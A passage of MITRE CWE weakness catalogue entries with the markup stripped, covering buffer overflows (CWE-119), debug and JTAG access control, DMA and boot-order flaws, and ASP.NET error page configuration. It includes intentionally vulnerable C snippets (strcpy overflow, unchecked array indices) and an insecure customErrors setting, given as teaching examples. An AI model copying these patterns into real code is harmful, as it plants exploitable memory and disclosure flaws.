Some researchers, developers, and tools intend for it to mean "write past the end of a buffer," whereas others use the same term to mean "any read or write outside the boundaries of a buffer, whether before the beginning of the buffer or after the end of the buffer." Still others using the same term could mean "any action after the end of a buffer, whether it is a read or write." Since the term is commonly used for exploitation and for vulnerabilities, it further confuses things. + + + buffer overrun + Some prominent vendors and researchers use the term "buffer overrun," but most people use "buffer overflow." See the alternate term for "buffer overflow" for context. + + + memory safety + Generally used for techniques that avoid weaknesses related to memory access, such as those identified by CWE-119 and its descendants. However, the term is not formal, and there is likely disagreement between practitioners as to which weaknesses are implicitly covered by the "memory safety" term. + + + + + Implementation + + + High + + + Integrity + Confidentiality + Availability + Execute Unauthorized Code or Commands + Modify Memory + If the memory accessible by the attacker can be effectively controlled, it may be possible to execute arbitrary code, as with a standard buffer overflow. If the attacker can overwrite a pointer's worth of memory (usually 32 or 64 bits), they can redirect a function pointer to their own malicious code. Even when the attacker can only modify a single byte arbitrary code execution can be possible. Sometimes this is because the same problem can be exploited repeatedly to the same effect. Other times it is because the attacker can overwrite security-critical application-specific data -- such as a flag indicating whether the user is an administrator. + + + Availability + Confidentiality + Read Memory + DoS: Crash, Exit, or Restart + DoS: Resource Consumption (CPU) + DoS: Resource Consumption (Memory) + Out of bounds memory access will very likely result in the corruption of relevant memory, and perhaps instructions, possibly leading to a crash. Other attacks leading to lack of availability are possible, including putting the program into an infinite loop. + + + Confidentiality + Read Memory + In the case of an out-of-bounds read, the attacker may have access to sensitive information. If the sensitive information contains system details, such as the current buffers position in memory, this knowledge can be used to craft further attacks, possibly with more severe consequences. + + + + + Automated Static Analysis + + This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives. + Automated static analysis generally does not account for environmental considerations when reporting out-of-bounds memory operations. This can make it difficult for users to determine which warnings should be investigated first. For example, an analysis tool might report buffer overflows that originate from command line arguments in a program that is not expected to run with setuid or other special privileges. + + High + Detection techniques for buffer-related errors are more mature than for most other weakness types. + + + Automated Dynamic Analysis + This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results. + + + Automated Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Binary / Bytecode Quality Analysis + Bytecode Weakness Analysis - including disassembler + source code weakness analysis + Binary Weakness Analysis - including disassembler + source code weakness analysis + + + + SOAR Partial + + + Manual Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies + + + + SOAR Partial + + + Dynamic Analysis with Automated Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Web Application Scanner + Web Services Scanner + Database Scanners + + + + SOAR Partial + + + Dynamic Analysis with Manual Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Fuzz Tester + Framework-based Fuzzer + + + + SOAR Partial + + + Manual Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Focused Manual Spotcheck - Focused manual analysis of source + Manual Source Code Review (not inspections) + + + + SOAR Partial + + + Automated Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Source code Weakness Analyzer + Context-configured Source Code Weakness Analyzer + + Cost effective for partial coverage: + + Source Code Quality Analyzer + + + + High + + + Architecture or Design Review + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Formal Methods / Correct-By-Construction + + Cost effective for partial coverage: + + Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) + + + + High + + + + + Requirements + Language Selection + + Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. + For example, many languages that perform their own memory management, such as Java and Perl, are not subject to buffer overflows. Other languages, such as Ada and C#, typically provide overflow protection, but the protection can be disabled by the programmer. + Be wary that a language's interface to native code may still be subject to overflows, even if the language itself is theoretically safe. + + + + Architecture and Design + Libraries or Frameworks + + Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. + Examples include the Safe C String Library (SafeStr) by Messier and Viega [REF-57], and the Strsafe.h library from Microsoft [REF-56]. These libraries provide safer versions of overflow-prone string-handling functions. + + This is not a complete solution, since many buffer overflows are not related to strings. + + + Operation + Build and Compilation + Environment Hardening + + Use automatic buffer overflow detection mechanisms that are offered by certain compilers or compiler extensions. Examples include: the Microsoft Visual Studio /GS flag, Fedora/Red Hat FORTIFY_SOURCE GCC flag, StackGuard, and ProPolice, which provide various mechanisms including canary-based detection and range/index checking. + D3-SFCV (Stack Frame Canary Validation) from D3FEND [REF-1334] discusses canary-based detection in detail. + + + Defense in Depth + + This is not necessarily a complete solution, since these mechanisms only detect certain types of overflows. In addition, the result is still a denial of service, since the typical response is to exit the application. + + + + Implementation + + Consider adhering to the following rules when allocating and managing an application's memory: + + Double check that the buffer is as large as specified. + When using functions that accept a number of bytes to copy, such as strncpy(), be aware that if the destination buffer size is equal to the source buffer size, it may not NULL-terminate the string. + Check buffer boundaries if accessing the buffer in a loop and make sure there is no danger of writing past the allocated space. + If necessary, truncate all input strings to a reasonable length before passing them to the copy and concatenation functions. + + + + + Operation + Build and Compilation + Environment Hardening + + Run or compile the software using features or extensions that randomly arrange the positions of a program's executable and libraries in memory. Because this makes the addresses unpredictable, it can prevent an attacker from reliably jumping to exploitable code. + Examples include Address Space Layout Randomization (ASLR) [REF-58] [REF-60] and Position-Independent Executables (PIE) [REF-64]. Imported modules may be similarly realigned if their default memory addresses conflict with other modules, in a process known as "rebasing" (for Windows) and "prelinking" (for Linux) [REF-1332] using randomly generated addresses. ASLR for libraries cannot be used in conjunction with prelink since it would require relocating the libraries at run-time, defeating the whole purpose of prelinking. + For more information on these techniques see D3-SAOR (Segment Address Offset Randomization) from D3FEND [REF-1335]. + + Defense in Depth + These techniques do not provide a complete solution. For instance, exploits frequently use a bug that discloses memory addresses in order to maximize reliability of code execution [REF-1337]. It has also been shown that a side-channel attack can bypass ASLR [REF-1333] + + + Operation + Environment Hardening + + Use a CPU and operating system that offers Data Execution Protection (using hardware NX or XD bits) or the equivalent techniques that simulate this feature in software, such as PaX [REF-60] [REF-61]. These techniques ensure that any instruction executed is exclusively at a memory address that is part of the code segment. + For more information on these techniques see D3-PSEP (Process Segment Execution Prevention) from D3FEND [REF-1336]. + + Defense in Depth + This is not a complete solution, since buffer overflows could be used to overwrite nearby variables to modify the software's state in dangerous ways. In addition, it cannot be used in cases in which self-modifying code is required. Finally, an attack could still cause a denial of service, since the typical response is to exit the application. + + + Implementation + Replace unbounded copy functions with analogous functions that support length arguments, such as strcpy with strncpy. Create these if they are not available. + Moderate + This approach is still susceptible to calculation errors, including issues such as off-by-one errors (CWE-193) and incorrectly calculating buffer lengths (CWE-131). + + + + + This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer. + + void host_lookup(char *user_supplied_addr){ + struct hostent *hp;in_addr_t *addr;char hostname[64];in_addr_t inet_addr(const char *cp); + + /*routine that ensures user_supplied_addr is in the right format for conversion */ + + validate_addr_form(user_supplied_addr);addr = inet_addr(user_supplied_addr);hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET);strcpy(hostname, hp->h_name); + } + + This function allocates a buffer of 64 bytes to store the hostname, however there is no guarantee that the hostname will not be larger than 64 bytes. If an attacker specifies an address which resolves to a very large hostname, then the function may overwrite sensitive data or even relinquish control flow to the attacker. + Note that this example also contains an unchecked return value (CWE-252) that can lead to a NULL pointer dereference (CWE-476). + + + This example applies an encoding procedure to an input string and stores it into a buffer. + + char * copy_input(char *user_supplied_string){ + int i, dst_index;char *dst_buf = (char*)malloc(4*sizeof(char) * MAX_SIZE);if ( MAX_SIZE <= strlen(user_supplied_string) ){die("user string too long, die evil hacker!");}dst_index = 0;for ( i = 0; i < strlen(user_supplied_string); i++ ){ + if( '&' == user_supplied_string[i] ){dst_buf[dst_index++] = '&';dst_buf[dst_index++] = 'a';dst_buf[dst_index++] = 'm';dst_buf[dst_index++] = 'p';dst_buf[dst_index++] = ';';}else if ('<' == user_supplied_string[i] ){ + /* encode to &lt; */ + + }else dst_buf[dst_index++] = user_supplied_string[i]; + }return dst_buf; + } + + The programmer attempts to encode the ampersand character in the user-controlled string, however the length of the string is validated before the encoding procedure is applied. Furthermore, the programmer assumes encoding expansion will only expand a given character by a factor of 4, while the encoding of the ampersand expands by 5. As a result, when the encoding procedure expands the string it is possible to overflow the destination buffer if the attacker provides a string of many ampersands. + + + The following example asks a user for an offset into an array to select an item. + + + int main (int argc, char **argv) {char *items[] = {"boat", "car", "truck", "train"};int index = GetUntrustedOffset();printf("You selected %s\n", items[index-1]);} + + The programmer allows the user to specify which element in the list to select, however an attacker can provide an out-of-bounds offset, resulting in a buffer over-read (CWE-126). + + + In the following code, the method retrieves a value from an array at a specific array index location that is given as an input parameter to the method + + int getValueFromArray(int *array, int len, int index) { + + int value; + + // check that the array index is less than the maximum + + + // length of the array + if (index < len) { + + // get the value at the specified index of the array + value = array[index]; + } + // if array index is invalid then output error message + + // and return value indicating error + else {printf("Value is: %d\n", array[index]);value = -1;} + return value; + } + + However, this method only verifies that the given array index is less than the maximum length of the array but does not check for the minimum value (CWE-839). This will allow a negative value to be accepted as the input array index, which will result in a out of bounds read (CWE-125) and may allow access to sensitive memory. The input array index should be checked to verify that is within the maximum and minimum range required for the array (CWE-129). In this example the if statement should be modified to include a minimum range check, as shown below. + + + ... + + // check that the array index is within the correct + + + // range of values for the array + if (index >= 0 && index < len) { + ... + + + + Windows provides the _mbs family of functions to perform various operations on multibyte strings. When these functions are passed a malformed multibyte string, such as a string containing a valid leading byte followed by a single null byte, they can read or write past the end of the string buffer causing a buffer overflow. The following functions all pose a risk of buffer overflow: _mbsinc _mbsdec _mbsncat _mbsncpy _mbsnextc _mbsnset _mbsrev _mbsset _mbsstr _mbstok _mbccpy _mbslen + + + + + CVE-2021-22991 + Incorrect URI normalization in application traffic product leads to buffer overflow, as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2021-22991 + + + CVE-2020-29557 + Buffer overflow in Wi-Fi router web interface, as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2020-29557 + + + CVE-2009-2550 + Classic stack-based buffer overflow in media player using a long entry in a playlist + https://www.cve.org/CVERecord?id=CVE-2009-2550 + + + CVE-2009-2403 + Heap-based buffer overflow in media player using a long entry in a playlist + https://www.cve.org/CVERecord?id=CVE-2009-2403 + + + CVE-2009-0689 + large precision value in a format string triggers overflow + https://www.cve.org/CVERecord?id=CVE-2009-0689 + + + CVE-2009-0690 + negative offset value leads to out-of-bounds read + https://www.cve.org/CVERecord?id=CVE-2009-0690 + + + CVE-2009-1532 + malformed inputs cause accesses of uninitialized or previously-deleted objects, leading to memory corruption + https://www.cve.org/CVERecord?id=CVE-2009-1532 + + + CVE-2009-1528 + chain: lack of synchronization leads to memory corruption + https://www.cve.org/CVERecord?id=CVE-2009-1528 + + + CVE-2021-29529 + Chain: machine-learning product can have a heap-based + buffer overflow (CWE-122) when some integer-oriented bounds are + calculated by using ceiling() and floor() on floating point values + (CWE-1339) + https://www.cve.org/CVERecord?id=CVE-2021-29529 + + + CVE-2009-0558 + attacker-controlled array index leads to code execution + https://www.cve.org/CVERecord?id=CVE-2009-0558 + + + CVE-2009-0269 + chain: -1 value from a function call was intended to indicate an error, but is used as an array index instead. + https://www.cve.org/CVERecord?id=CVE-2009-0269 + + + CVE-2009-0566 + chain: incorrect calculations lead to incorrect pointer dereference and memory corruption + https://www.cve.org/CVERecord?id=CVE-2009-0566 + + + CVE-2009-1350 + product accepts crafted messages that lead to a dereference of an arbitrary pointer + https://www.cve.org/CVERecord?id=CVE-2009-1350 + + + CVE-2009-0191 + chain: malformed input causes dereference of uninitialized memory + https://www.cve.org/CVERecord?id=CVE-2009-0191 + + + CVE-2008-4113 + OS kernel trusts userland-supplied length value, allowing reading of sensitive information + https://www.cve.org/CVERecord?id=CVE-2008-4113 + + + CVE-2005-1513 + Chain: integer overflow in securely-coded mail program leads to buffer overflow. In 2005, this was regarded as unrealistic to exploit, but in 2020, it was rediscovered to be easier to exploit due to evolutions of the technology. + https://www.cve.org/CVERecord?id=CVE-2005-1513 + + + CVE-2003-0542 + buffer overflow involving a regular expression with a large number of captures + https://www.cve.org/CVERecord?id=CVE-2003-0542 + + + CVE-2017-1000121 + chain: unchecked message size metadata allows integer overflow (CWE-190) leading to buffer overflow (CWE-119). + https://www.cve.org/CVERecord?id=CVE-2017-1000121 + + + + Memory + + + + A5 + Buffer Overflows + Exact + + + ARR00-C + Understand how arrays work + + + ARR30-C + Do not form or use out-of-bounds pointers or array subscripts + CWE More Abstract + + + ARR38-C + Guarantee that library functions do not form invalid pointers + CWE More Abstract + + + ENV01-C + Do not make assumptions about the size of an environment variable + + + EXP39-C + Do not access a variable through a pointer of an incompatible type + Imprecise + + + FIO37-C + Do not assume character data has been read + + + STR31-C + Guarantee that storage for strings has sufficient space for character data and the null terminator + CWE More Abstract + + + STR32-C + Do not pass a non-null-terminated character sequence to a library function that expects a string + CWE More Abstract + + + 7 + Buffer Overflow + + + SFP8 + Faulty Buffer Access + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Discouraged + CWE-119 is commonly misused in low-information vulnerability reports when lower-level CWEs could be used instead, or when more details about the vulnerability are available. + Look at CWE-119's children and consider mapping to CWEs such as CWE-787: Out-of-bounds Write, CWE-125: Out-of-bounds Read, or others. + + + + + + + It is possible in any programming languages without memory management support to attempt an operation outside of the bounds of a memory buffer, but the consequences will vary widely depending on the language, platform, and chip architecture. + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + Veracode + 2008-08-15 + Suggested OWASP Top Ten 2004 mapping + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Relationships + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-01-12 + updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Likelihood_of_Exploit, Name, Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2009-03-10 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-07-27 + updated Observed_Examples + + + CWE Content Team + MITRE + 2009-10-29 + updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2009-12-28 + updated Common_Consequences, Demonstrative_Examples, Detection_Factors, Observed_Examples + + + CWE Content Team + MITRE + 2010-02-16 + updated Alternate_Terms, Applicable_Platforms, Demonstrative_Examples, Detection_Factors, Potential_Mitigations, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-06-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-09-27 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2010-12-13 + updated Name + + + CWE Content Team + MITRE + 2011-03-29 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-02-21 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2014-02-18 + updated Potential_Mitigations, References + + + CWE Content Team + MITRE + 2014-07-30 + updated Detection_Factors, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2018-03-27 + updated References + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2019-09-19 + updated References, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships, Taxonomy_Mappings, Time_of_Introduction + + + CWE Content Team + MITRE + 2020-06-25 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Alternate_Terms, Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Alternate_Terms, Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Demonstrative_Examples, Observed_Examples, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2022-06-28 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-01-31 + updated Alternate_Terms, Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Potential_Mitigations, References, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + Buffer Errors + Failure to Constrain Operations within the Bounds of an Allocated Memory Buffer + Failure to Constrain Operations within the Bounds of a Memory Buffer + + + + The product enables a Direct Memory Access (DMA) capable device before the security configuration settings are established, which allows an attacker to extract data from or gain privileges on the product. + + DMA is included in a number of devices because it allows + data transfer between the computer and the connected device, using + direct hardware access to read or write directly to main memory + without any OS interaction. An attacker could exploit this to + access secrets. Several virtualization-based mitigations have been introduced to thwart DMA attacks. These are usually + configured/setup during boot time. However, certain IPs that are + powered up before boot is complete (known as early boot IPs) may + be DMA capable. Such IPs, if not trusted, could launch DMA + attacks and gain access to assets that should otherwise be + protected. + + + + + + + + + + + Architecture and Design + + + + + Access Control + Bypass Protection Mechanism + Modify Memory + High + DMA devices have direct write access to main memory and + due to time of attack will be able to bypass OS or Bootloader + access control. + + + + + Architecture and Design + Utilize an IOMMU to orchestrate IO access from + the start of the boot process. + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi + Intel Corporation + 2019-10-15 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The chip does not implement or does not correctly perform access control to check whether users are authorized to access internal registers and test modes through the physical debug/test interface. + + A device's internal information may be accessed through a scan chain of interconnected internal registers, usually through a JTAG interface. The JTAG interface provides access to these registers in a serial fashion in the form of a scan chain for the purposes of debugging programs running on a device. Since almost all information contained within a device may be accessed over this interface, device manufacturers typically insert some form of authentication and authorization to prevent unintended use of this sensitive information. This mechanism is implemented in addition to on-chip protections that are already present. + If authorization, authentication, or some other form of access control is not implemented or not implemented correctly, a user may be able to bypass on-chip protection mechanisms through the debug interface. + Sometimes, designers choose not to expose the debug pins on the motherboard. Instead, they choose to hide these pins in the intermediate layers of the board. This is primarily done to work around the lack of debug authorization inside the chip. In such a scenario (without debug authorization), when the debug interface is exposed, chip internals are accessible to an attacker. + + + + + + + Primary + + + + + + + + + + + Architecture and Design + + + Implementation + + + + + Confidentiality + Read Application Data + High + + + Confidentiality + Read Memory + High + + + Authorization + Execute Unauthorized Code or Commands + High + + + Integrity + Modify Memory + High + + + Integrity + Modify Application Data + High + + + Access Control + Bypass Protection Mechanism + High + + + + + Dynamic Analysis with Manual Results Interpretation + Authentication and authorization of debug and test interfaces should be part of the architecture and design review process. Withholding of private register documentation from the debug and test interface public specification ("Security by obscurity") should not be considered as sufficient security. + + + Dynamic Analysis with Manual Results Interpretation + Dynamic tests should be done in the pre-silicon and post-silicon stages to verify that the debug and test interfaces are not open by default. + + + Fuzzing + Tests that fuzz Debug and Test Interfaces should ensure that no access without appropriate authentication and authorization is possible. + Moderate + + + + + Architecture and Design + Separation of Privilege + + If feasible, the manufacturer should disable the JTAG interface or implement authentication and authorization for the JTAG interface. If authentication logic is added, it should be resistant to timing attacks. Security-sensitive data stored in registers, such as keys, etc. should be cleared when entering debug mode. + + High + + + + + A home, WiFi-router device implements a login prompt which prevents an unauthorized user from issuing any commands on the device until appropriate credentials are provided. The credentials are protected on the device and are checked for strength against attack. + + If the JTAG interface on this device is not hidden by the manufacturer, the interface may be identified using tools such as JTAGulator. If it is hidden but not disabled, it can be exposed by physically wiring to the board. + By issuing a "halt" command before the OS starts, the unauthorized user pauses the watchdog timer and prevents the router from restarting (once the watchdog timer would have expired). Having paused the router, an unauthorized user is able to execute code and inspect and modify data in the device, even extracting all of the router's firmware. This allows the user to examine the router and potentially exploit it. + + JTAG is useful to chip and device manufacturers during design, testing, and production and is included in nearly every product. Without proper authentication and authorization, the interface may allow tampering with a product. + In order to prevent exposing the debugging interface, manufacturers might try to obfuscate the JTAG interface or blow device internal fuses to disable the JTAG interface. Adding authentication and authorization to this interface makes use by unauthorized individuals much more difficult. + + + + + CVE-2019-18827 + chain: JTAG interface is not disabled (CWE-1191) during ROM code execution, introducing a race condition (CWE-362) to extract encryption keys + https://www.cve.org/CVERecord?id=CVE-2019-18827 + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE-1191 and CWE-1244 both involve physical debug access, + but the weaknesses are different. CWE-1191 is effectively + about missing authorization for a debug interface, + i.e. JTAG. CWE-1244 is about providing internal assets with + the wrong debug access level, exposing the asset to + untrusted debug agents. + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi + Intel Corporation + 2019-10-15 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-06-25 + updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Name, References, Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Applicable_Platforms, Demonstrative_Examples, Description, Name, Potential_Mitigations, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2021-10-28 + updated Demonstrative_Examples, Description, Detection_Factors, Maintenance_Notes, Name, Potential_Mitigations, Relationship_Notes, Relationships, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2022-04-28 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-10-13 + updated Description, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + Parbati K. Manna + Intel Corporation + 2021-10-18 + provided detection methods + + + Narasimha Kumar V Mangipudi + Lattice Semiconductor + 2021-10-20 + reviewed content changes + + + Hareesh Khattri + Intel Corporation + 2021-10-22 + clarified differences between CWE-1191 and CWE-1244 + + + Arun Kanuparthi + Intel Corporation + 2021-10-27 + suggested additional detail in extended description + + Exposed Chip Debug Interface With Insufficient Access Control + Exposed Chip Debug and or Test Interface With Insufficient Access Control + Exposed Chip Debug and Test Interface With Insufficient or Missing Authorization + + + + The System-on-Chip (SoC) does not have unique, immutable identifiers for each of its components. + + A System-on-Chip (SoC) comprises several components (IP) with varied + trust requirements. It is required that each IP is identified + uniquely and should distinguish itself from other entities in + the SoC without any ambiguity. The unique secured identity is + required for various purposes. Most of the time the identity is used + to route a transaction or perform certain actions, including + resetting, retrieving a sensitive information, and acting upon or on + behalf of something else. + There are several variants of this weakness: + + A "missing" identifier is when the SoC does not define + any mechanism to uniquely identify the IP. + An "insufficient" identifier might provide + some defenses - for example, against the most common + attacks - but it does not protect against everything + that is intended. + A "misconfigured" mechanism occurs when a mechanism + is available but not implemented correctly. + An "ignored" identifier occurs when the SoC/IP has not applied + any policies or does not act upon the identifier securely. + + + + + + + + + + + + Architecture and Design + + + Implementation + + + Operation + + + + + Access Control + Bypass Protection Mechanism + High + + + + + Architecture and Design + Separation of Privilege + + + Every identity generated in the SoC should be unique and + immutable in hardware. The actions that an IP is trusted or + not trusted should be clearly defined, implemented, + configured, and tested. If the definition is implemented via a + policy, then the policy should be immutable or protected with + clear authentication and authorization. + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi + Intel Corporation + 2019-10-15 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated Description + + + CWE Content Team + MITRE + 2020-12-10 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product enables components that contain untrusted firmware before memory and fabric access controls have been enabled. + + + After initial reset, System-on-Chip (SoC) fabric access controls and other + security features need to be programmed by trusted firmware as part + of the boot sequence. If untrusted IPs or peripheral microcontrollers + are enabled first, then the untrusted component can master + transactions on the hardware bus and target memory or other assets to + compromise the SoC boot firmware. + + + + + + Access Control + Bypass Protection Mechanism + High + An untrusted component can master transactions on the HW bus and target memory or other assets to compromise the SoC boot firmware. + + + + + Architecture and Design + + The boot sequence should enable fabric access controls and memory protections before enabling third-party hardware IPs and peripheral microcontrollers that use untrusted firmware. + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi + Intel Corporation + 2019-10-15 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2020-08-20 + updated References, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + An ASP .NET application must enable custom error pages in order to prevent attackers from mining information from the framework's built-in responses. + + + + + + + + The mode attribute of the <customErrors> tag defines whether custom or default error pages are used. + + + + Implementation + + + Operation + + + + + Confidentiality + Read Application Data + Default error pages gives detailed information about the error that occurred, and should not be used in production environments. Attackers can leverage the additional information provided by a default error page to mount attacks targeted on the framework, database, or other resources used by the application. + + + + + System Configuration + Handle exceptions appropriately in source code. ASP .NET applications should be configured to use custom error pages instead of the framework default page. + + + Architecture and Design + Do not attempt to process an error or attempt to mask it. + + + Implementation + Verify return values are correct and do not supply sensitive information about the system. + + + + + The mode attribute of the <customErrors> tag in the Web.config file defines whether custom or default error pages are used. + In the following insecure ASP.NET application setting, custom error message mode is turned off. An ASP.NET error message with detailed stack trace and platform versions will be returned. + + <customErrors mode="Off" /> + + A more secure setting is to set the custom error message mode for remote users only. No defaultRedirect error page is specified. The local user on the web server will see a detailed stack trace. For remote users, an ASP.NET error message with the server customError configuration setting and the platform version will be returned. + + <customErrors mode="RemoteOnly" /> + + Another secure option is to set the mode attribute of the <customErrors> tag to use a custom page as follows: + + <customErrors mode="On" defaultRedirect="YourErrorPage.htm" /> + + + + + + ASP.NET Misconfiguration: Missing Custom Error Handling + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated References, Demonstrative_Example, Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, References, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Relationships + + + CWE Content Team + MITRE + 2008-11-24 + updated Common_Consequences, Other_Notes, Potential_Mitigations + + + CWE Content Team + MITRE + 2009-03-10 + updated Name, Relationships + + + CWE Content Team + MITRE + 2009-07-27 + updated Background_Details, Common_Consequences, Other_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-02-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Demonstrative_Examples, Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + ASP.NET Misconfiguration: Missing 